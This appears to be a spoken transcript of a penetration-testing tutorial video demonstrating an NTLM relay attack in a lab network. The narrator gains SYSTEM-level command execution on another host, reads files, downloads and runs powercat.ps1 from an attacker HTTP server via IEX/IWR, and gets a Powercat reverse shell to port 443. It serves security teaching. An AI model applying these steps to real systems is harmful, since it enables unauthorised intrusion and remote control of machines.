All right, and welcome back. So today we're going to be looking at NTLM relay. Okay, now for this attack to work, the user that you currently have has to be an administrator on another machine. Okay, so if they're an administrator in more than one location, then that can allow for an NTLM relay to work. From there, SMB signing also has to be disabled. Okay, so those are the things that will make this attack actually work right here. Now, as we know right now, if I were to, as we know of like right now, if I were to have a net NTLM hash as this, right, I cannot pass this hash, supposedly. Okay, we're not going to pass it in the original sense of passing a hash. What we're going to do is we're going to start up proxy chains. Well, excuse me, you don't need to start proxy chains. We're going to start up NTLM relay. Now, this machine is going from an external to an internal network, and the machine that we want to talk to is on that internal network also. So that's why I have proxy chains, NTLM relay. Proxy chains are already running over on the Windows machine also. Chisel proxy. And then from there, we have our targets.txt. So if I cat that targets.txt, okay, we have two machines out here, right? SMB2 support. We're going to call for a command. That's going to utilize PowerShell.exe, which is then going to tell PowerShell to call for a command, right? And then the command's going to be who am I. So let's go ahead and run that right there. We'll run a who am I. Now, if you don't know how to set up proxies, I do have a whole video on that where we set up quite a few different proxies, a few different ways to set one up. So now we have this. Let's go ahead and look for a directory that does not exist, calling back to our Kali machine back here. So if I do an ifconfig real quick, we can see that my IP address is 192.168.0.17. And we're going to look for something that does not exist. So we're using SMB to look for something that does exist. I'll hit enter here. And as you can see, on 10.10.10.48, which this is 10.10.10.49 over here, so that means I talk to a different machine, I am NT Authority System. That's NTLM relay. Okay, for on impact there. Now, what can we do with this? We can start to look into different things. Like we go into C drive, users, caret. All right, I put a little file in there. Okay, we can start to look in there. Enter a little bit too quick on that guy. There we go. Okay, we can start to look at these different places. And now it doesn't want to do anything. Of course it does it, right? Now this always works. All right, let's go ahead and try this again. We might have to exit out of this guy. Go back into another PowerShell. And we'll try this again. Yeah, it does not want to look for it anymore. Okay, there we go. At least got to call back to us again. I did not do a dir. I just said C users caret, didn't I? So let's go ahead and do a dir in there. There we go. It's a list of directory contents, right? And we have this find.txt. Okay, let's go ahead and type that out. Whoops. Let's go ahead and type out that C users caret / find.txt. And there we go. It says find me. Okay. Now the other day when I was doing this video, we ended up having to delete it just because there's some background music in there. Myself was some music. It got in the video. So we ended up having to delete that one. But from here, we thought, wait, can't we technically set up Powercat on the Windows machine and then have 10.10.10.48 call through Powercat to the Windows machine? And we can. Okay, so how do we do that, right? Well, we know, well, we think we might have a share. Okay, so let's go ahead and run this again, and we'll do a directory in C users, so we can see how to actually get onto another machine now, or in the C drive. We'll run a directory, dir, on the C drive, right? And then from there, we'll call back to me again, and we can see that there is a share on here. So from here, what we did was we went ahead and since we had RDP access to this guy, we went to that share real quick, right? So 10.10.10.48 slash share, and we put a Powercat file in there. This Powercat file, if I go ahead and I believe it's still on my desktop also, it is. So we'll go ahead and we'll notepad that Powercat file, and I'll show you what that states in there. So notepad, desktop, Powercat. And you see at the very bottom, we're telling Powercat to connect to 10.10.10.49 on port 443 utilizing PowerShell. Okay. Now, to be able to do this, we're going to go ahead and we're going to start up another Windows guy here. We're going to have to put Powercat on this machine also, so we can cd into tools, start up Python server, IEX, IWR, use basic parsing, HTTP 192.168.0.17 slash powercat.ps1. Now let's go ahead and take a quick look at, before I do this, or tail, powercat.ps1. Okay, that does have it on there, so we want to go ahead and get rid of that because we don't want it to do that on this one, like right here, right? On the Windows machine that we're on, like right now, we don't want it to make a callback to itself. So let's go ahead and get rid of that real quick. There we go. Okay, we'll save that. All right. And then we'll come back and we'll start up our Python server again. We'll hit enter here. Okay, now that's now on there, right? So now we can run Powercat, TAC-L will listen, right, on port 443. I'm going to go back into my Powercat file down here and just put in what was there before, just so I don't forget. So then, whenever I have to do this later on in the future, then I don't mess it up, or I don't have to, go out and try to figure out how to do it again. Okay, so I just like to save it down there. All right, so now we have Powercat on our Windows machine. We have Powercat with this information at the bottom of it sitting as share, and we know that we can run commands on that 10.10.10.48 machine. All right, so we'll go ahead and we have this guy listening now, and let's go back into desktop because that's right where our targets folder's at, and we will run something like import module, TAC EP bypass. Let's go ahead and just import module. We'll try this first. Import module, and we'll do C share powercat.ps1. Let's go ahead and try that real quick, and let's see if we can't get something on there. Now remember, we have to come back over here, go to our other PowerShell, call for a directory that doesn't exist, calls back to me. Let's go ahead and see if we get a callback up here, and we do get a callback from someone. Who am I? I'm NT Authority System, IP config. So we got a callback from 10.10.10.48. So now we can now directly talk with 10.10.10.48 through this Windows machine here by utilizing Kali running that Powercat file that we put onto that share system. Okay, so that's just another way to be able to start to interact with that machine. From there, we can start to upload things from Kali or whatever else. And since we're NT Authority System, in all honesty, we can actually, have made our own user or whatever else we want to do. We could have done that through the NTLMRelay, but that is how to be able to pass a NTLM hash across a domain network to another machine as long as SMB signing's turned off, right? And the user is administrator on more than one machine. All right, as long as everything like that adds up, you should be able to utilize NTLMRelay. So I hope you guys learned something with this. I know that the other day when we were doing it, we definitely learned a lot. This was more of just a practice again. Sorry I had to upload the video twice, but thanks a lot for sticking around. Thanks a lot for watching, and you all have a good one.